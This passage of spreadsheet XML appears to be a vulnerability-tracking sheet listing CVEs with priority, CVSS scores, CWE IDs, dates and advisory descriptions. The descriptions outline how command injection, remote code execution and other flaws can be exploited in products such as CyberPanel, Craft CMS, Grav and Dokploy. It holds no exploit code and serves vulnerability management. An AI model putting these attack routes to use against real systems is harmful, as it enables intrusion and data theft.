      <c r="M1204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71491</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71961</t>
        </is>
      </c>
      <c r="C1205" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1205" s="5" t="inlineStr"/>
      <c r="F1205" s="5" t="n">
        <v>0.031</v>
      </c>
      <c r="G1205" s="5" t="inlineStr"/>
      <c r="H1205" s="5" t="inlineStr"/>
      <c r="I1205" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1205" s="5" t="inlineStr"/>
      <c r="K1205" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1205" s="5" t="inlineStr">
        <is>
          <t>Cudy WR3000 2.0 running firmware before 2.5.24 contains an OS command injection vulnerability that allows authenticated attackers to execute arbitrary OS commands with root privileges by sending unsanitized input through the mesh MQTT command interface. The sync_command binary forwards unsanitized input directly to a shell execution sink in command.lua, enabling attackers with access to the MQTT broker to exploit the default-enabled command execution path to achieve full root-level system compromise.</t>
        </is>
      </c>
      <c r="M1205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71961</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71965</t>
        </is>
      </c>
      <c r="C1206" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1206" s="5" t="inlineStr"/>
      <c r="F1206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1206" s="5" t="inlineStr"/>
      <c r="H1206" s="5" t="inlineStr"/>
      <c r="I1206" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1206" s="5" t="inlineStr"/>
      <c r="K1206" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1206" s="5" t="inlineStr">
        <is>
          <t>CyberPanel 2.4.3, fixed in commit eca0c3c, contains an authenticated remote code execution vulnerability in the remote backup feature that allows authenticated attackers to gain root-level SSH access by supplying a malicious remote server address. Attackers can exploit the unverified SSH public key retrieval process to write an attacker-controlled public key directly to /root/.ssh/authorized_keys, granting persistent root access to the host system.</t>
        </is>
      </c>
      <c r="M1206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71965</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71966</t>
        </is>
      </c>
      <c r="C1207" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1207" s="5" t="inlineStr"/>
      <c r="F1207" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="G1207" s="5" t="inlineStr"/>
      <c r="H1207" s="5" t="inlineStr"/>
      <c r="I1207" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1207" s="5" t="inlineStr"/>
      <c r="K1207" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1207" s="5" t="inlineStr">
        <is>
          <t>CyberPanel 2.4.3, fixed in commit eca0c3c, contains an authenticated command injection vulnerability in the remote backup transfer feature that allows authenticated attackers to execute arbitrary OS commands by controlling a remote server's API response. Attackers can inject malicious commands through a crafted directory name in the remote server's API response, which bypasses security middleware validation and is passed unsanitized to the OS command execution function.</t>
        </is>
      </c>
      <c r="M1207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71966</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71981</t>
        </is>
      </c>
      <c r="C1208" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1208" s="5" t="inlineStr"/>
      <c r="F1208" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1208" s="5" t="inlineStr"/>
      <c r="H1208" s="5" t="inlineStr"/>
      <c r="I1208" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1208" s="5" t="inlineStr"/>
      <c r="K1208" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1208" s="5" t="inlineStr">
        <is>
          <t>Cypht before 2.12.2 contains a PHP object injection vulnerability that allows authenticated attackers to execute arbitrary operating system commands by supplying a crafted PHP object graph in the back_query GET parameter of the logout handler. Attackers can pass a base64-encoded serialized payload through this parameter, which is decoded and passed directly to unserialize() without an allow-list, signature check, or type restriction, enabling gadget-chain exploitation to achieve remote code execution as the web server process.</t>
        </is>
      </c>
      <c r="M1208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71981</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72730</t>
        </is>
      </c>
      <c r="C1209" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1209" s="5" t="inlineStr"/>
      <c r="F1209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1209" s="5" t="inlineStr"/>
      <c r="H1209" s="5" t="inlineStr"/>
      <c r="I1209" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1209" s="5" t="inlineStr"/>
      <c r="K1209" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1209" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0, the Rich Text Editor rendered a chat-transcript username as HTML, allowing stored cross-site scripting. This issue is fixed in versions 2026.1.6, 2026.5.2, 2026.6.1, and 2026.7.0.</t>
        </is>
      </c>
      <c r="M1209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72730</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72767</t>
        </is>
      </c>
      <c r="C1210" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1210" s="5" t="inlineStr"/>
      <c r="F1210" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1210" s="5" t="inlineStr"/>
      <c r="H1210" s="5" t="inlineStr"/>
      <c r="I1210" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1210" s="5" t="inlineStr"/>
      <c r="K1210" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1210" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.67, 2.x before 2.31.5, and 2.32.x before 2.32.1 contain a remote code execution vulnerability in the Git node. Authenticated users with rights to create and execute workflows can stage a crafted local repository that causes git to run hooks under default git security settings, executing arbitrary commands as the n8n process user. Both self-hosted and cloud instances are affected.</t>
        </is>
      </c>
      <c r="M1210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72767</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72779</t>
        </is>
      </c>
      <c r="C1211" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1211" s="5" t="inlineStr"/>
      <c r="F1211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1211" s="5" t="inlineStr"/>
      <c r="H1211" s="5" t="inlineStr"/>
      <c r="I1211" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1211" s="5" t="inlineStr"/>
      <c r="K1211" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1211" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0-RC1 before 5.10.6 and 4.0.0-RC1 before 4.18.2 contain an arbitrary file read vulnerability. The create() Twig function restricts class instantiation using a 5-entry blocklist that does not include SplFileObject, allowing an authenticated administrator (with allowAdminChanges=true) to configure a malicious entry type title or URI format that instantiates SplFileObject in a non-sandboxed template context. When a user subsequently creates an entry in the affected section, arbitrary files on the server (such as .env containing the security key and database credentials) are read and rendered as entry titles.</t>
        </is>
      </c>
      <c r="M1211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72779</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72781</t>
        </is>
      </c>
      <c r="C1212" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1212" s="5" t="inlineStr"/>
      <c r="F1212" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1212" s="5" t="inlineStr"/>
      <c r="H1212" s="5" t="inlineStr"/>
      <c r="I1212" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1212" s="5" t="inlineStr"/>
      <c r="K1212" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1212" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions &gt;= 5.0.0-RC1 before 5.10.7 and &gt;= 4.0.0-RC1 before 4.18.3 contain a remote code execution vulnerability in the Twig sandbox mechanism. Because Craft marks the ElementInterface as safe (via the AllowedInSandbox attribute) and the sandbox allowlisting extends to the entire class hierarchy (craft\base\Component up to yii\base\Component), an authenticated attacker with permission to access the control panel can render a malicious Twig template that abuses the yii\base\Component arbitrary function-call gadget to execute arbitrary code, even when the Twig sandbox is enabled via enableTwigSandbox().</t>
        </is>
      </c>
      <c r="M1212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72781</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72819</t>
        </is>
      </c>
      <c r="C1213" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1213" s="5" t="inlineStr"/>
      <c r="F1213" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1213" s="5" t="inlineStr"/>
      <c r="H1213" s="5" t="inlineStr"/>
      <c r="I1213" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1213" s="5" t="inlineStr"/>
      <c r="K1213" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1213" s="5" t="inlineStr">
        <is>
          <t>Grav CMS before 2.0.13 contains a remote code execution vulnerability in the Flex Objects plugin settings validation that allows authenticated users to execute arbitrary code by uploading a ZIP file containing PHP code. Attackers can bypass routine name validation by using array notation instead of string notation, call the unZip routine with a malicious archive, and write PHP files to the web root for execution.</t>
        </is>
      </c>
      <c r="M1213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72819</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72826</t>
        </is>
      </c>
      <c r="C1214" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1214" s="5" t="inlineStr"/>
      <c r="F1214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1214" s="5" t="inlineStr"/>
      <c r="H1214" s="5" t="inlineStr"/>
      <c r="I1214" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1214" s="5" t="inlineStr"/>
      <c r="K1214" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1214" s="5" t="inlineStr">
        <is>
          <t>The getgrav/grav-plugin-api plugin before 1.0.13 fails to validate that the scopes of a newly created API key are a subset of the caller's scopes in createApiKey. The self-target path of requireApiKeyPermission() requires only the baseline api.access scope, and the new key's scopes are read directly from the request body with no subset check. An attacker holding a minimal-scope API key on a super account can submit an empty scopes array to mint an unscoped, full-access super key, bypassing scope restrictions (and enabling further chains such as configuration write to RCE).</t>
        </is>
      </c>
      <c r="M1214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72826</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72827</t>
        </is>
      </c>
      <c r="C1215" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1215" s="5" t="inlineStr"/>
      <c r="F1215" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1215" s="5" t="inlineStr"/>
      <c r="H1215" s="5" t="inlineStr"/>
      <c r="I1215" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1215" s="5" t="inlineStr"/>
      <c r="K1215" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1215" s="5" t="inlineStr">
        <is>
          <t>Grav CMS before 2.0.13 contains a server-side template injection vulnerability in email-action parameters that allows low-privileged page editors to execute arbitrary operating-system commands. Attackers can inject Twig payloads using the unsandboxed find filter in email subject, body, to, or from fields to achieve remote code execution when forms are submitted.</t>
        </is>
      </c>
      <c r="M1215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72827</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72837</t>
        </is>
      </c>
      <c r="C1216" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1216" s="5" t="inlineStr"/>
      <c r="F1216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1216" s="5" t="inlineStr"/>
      <c r="H1216" s="5" t="inlineStr"/>
      <c r="I1216" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J1216" s="5" t="inlineStr"/>
      <c r="K1216" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1216" s="5" t="inlineStr">
        <is>
          <t>File Browser versions before 2.63.20 fail to honor the createUserDir isolation in proxy and hook authentication auto-provisioning paths. Attackers with valid upstream-authenticated credentials can read, modify, delete, and share files belonging to other users by exploiting the server root scope assignment.</t>
        </is>
      </c>
      <c r="M1216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72837</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72840</t>
        </is>
      </c>
      <c r="C1217" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1217" s="5" t="inlineStr"/>
      <c r="F1217" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1217" s="5" t="inlineStr"/>
      <c r="H1217" s="5" t="inlineStr"/>
      <c r="I1217" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1217" s="5" t="inlineStr"/>
      <c r="K1217" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1217" s="5" t="inlineStr">
        <is>
          <t>OpenWrt LuCI contains an overly permissive ACL definition in luci-mod-system-mounts that grants write access to /etc/crontabs/root to users intended only for mount configuration. Authenticated users with only the mount-configuration ACL group can append arbitrary cron entries via ubus file.write, which the default busybox crond daemon executes as root within one minute.</t>
        </is>
      </c>
      <c r="M1217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72840</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72870</t>
        </is>
      </c>
      <c r="C1218" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1218" s="5" t="inlineStr"/>
      <c r="F1218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1218" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1218" s="5" t="inlineStr"/>
      <c r="I1218" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1218" s="5" t="inlineStr"/>
      <c r="K1218" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1218" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the buildRemoteDocker() function in packages/server/src/utils/providers/docker.ts interpolates the application-controlled dockerImage value directly into a docker pull shell command. An authenticated user with project access can set a crafted dockerImage through application.update and trigger application.deploy, causing execAsync() to execute arbitrary operating-system commands as the Dokploy server process. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72870</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72874</t>
        </is>
      </c>
      <c r="C1219" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1219" s="5" t="inlineStr"/>
      <c r="F1219" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1219" s="5" t="inlineStr"/>
      <c r="H1219" s="5" t="inlineStr"/>
      <c r="I1219" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1219" s="5" t="inlineStr"/>
      <c r="K1219" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1219" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, cloneGitRepository in packages/server/src/utils/providers/git.ts interpolates customGitUrl and customGitBranch into a git clone command passed to execAsync or execAsyncRemote, allowing an authenticated user with application access to execute arbitrary operating system commands on the Dokploy host by setting a malicious custom Git URL and triggering deployment. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72874</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72884</t>
        </is>
      </c>
      <c r="C1220" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1220" s="5" t="inlineStr"/>
      <c r="F1220" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1220" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1220" s="5" t="inlineStr"/>
      <c r="I1220" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1220" s="5" t="inlineStr"/>
      <c r="K1220" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1220" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, sanitizeCommand in packages/server/src/utils/builders/compose.ts only trims whitespace and strips surrounding quotes from compose.command before exportEnvCommand and docker command interpolation, allowing an authenticated user who can update a Compose service to inject shell metacharacters and execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M1220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72884</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73062</t>
        </is>
      </c>
      <c r="C1221" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1221" s="5" t="inlineStr"/>
      <c r="F1221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1221" s="5" t="inlineStr"/>
      <c r="H1221" s="5" t="inlineStr"/>
      <c r="I1221" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1221" s="5" t="inlineStr"/>
      <c r="K1221" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1221" s="5" t="inlineStr">
        <is>
          <t>Scriban versions 3.0.0 through 7.2.0 contain a denial of service vulnerability in the array multiplication operator that allocates memory without enforcing LoopLimit or overflow-safe arithmetic checks. Attackers can supply a large integer multiplier in a template to force multi-gigabyte memory allocations, causing resource exhaustion and availability degradation.</t>
        </is>
      </c>
      <c r="M1221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73062</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73081</t>
        </is>
      </c>
      <c r="C1222" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1222" s="5" t="inlineStr"/>
      <c r="F1222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1222" s="5" t="inlineStr"/>
      <c r="H1222" s="5" t="inlineStr"/>
      <c r="I1222" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1222" s="5" t="inlineStr"/>
      <c r="K1222" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1222" s="5" t="inlineStr">
        <is>
          <t>Activepieces is an open source AI workflow automation platform. Prior to 0.80.0, the worker's code-compilation pipeline builds the on-disk path for a Code step from the step's name and passes that path to a shell-invoked build command. A step name containing shell metacharacters can break out of the intended build invocation and execute arbitrary commands during compilation before any code sandbox is created. An authenticated user with permission to create or edit a flow can execute commands as the worker process user, read and write the worker filesystem, exfiltrate environment secrets, and reach internal services available to the worker. This issue is fixed in version 0.80.0.</t>
        </is>
      </c>
      <c r="M1222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73081</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="C1223" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1223" s="5" t="inlineStr"/>
      <c r="F1223" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1223" s="5" t="inlineStr"/>
      <c r="H1223" s="5" t="inlineStr"/>
      <c r="I1223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1223" s="5" t="inlineStr"/>
      <c r="K1223" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L1223" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a signature verification logic error in the PayPal REST webhook handler that allows unauthenticated attackers to bypass payment signature validation by submitting a webhook request with an unsupported auth_algo header value. When the algorithm cannot be mapped to a supported hash function, the verification function incorrectly returns true instead of failing, causing the caller to treat the fabricated request as verified and process the payment event without a valid PayPal signature.</t>
        </is>
      </c>
      <c r="M1223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="C1224" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1224" s="5" t="inlineStr"/>
      <c r="F1224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1224" s="5" t="inlineStr"/>
      <c r="H1224" s="5" t="inlineStr"/>
      <c r="I1224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1224" s="5" t="inlineStr"/>
      <c r="K1224" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1224" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a payment replay vulnerability in the PayPal REST payment provider that allows attackers to process the same webhook payload multiple times by exploiting a missing duplicate transaction ID check. Attackers can replay a valid webhook payload to trigger duplicate payment events, resulting in repeated subscription activations and unauthorized account upgrades.</t>
        </is>
      </c>
      <c r="M1224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73413</t>
        </is>
      </c>
      <c r="C1225" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1225" s="5" t="inlineStr"/>
      <c r="F1225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1225" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1225" s="5" t="inlineStr"/>
      <c r="I1225" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1225" s="5" t="inlineStr"/>
      <c r="K1225" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1225" s="5" t="inlineStr">
        <is>
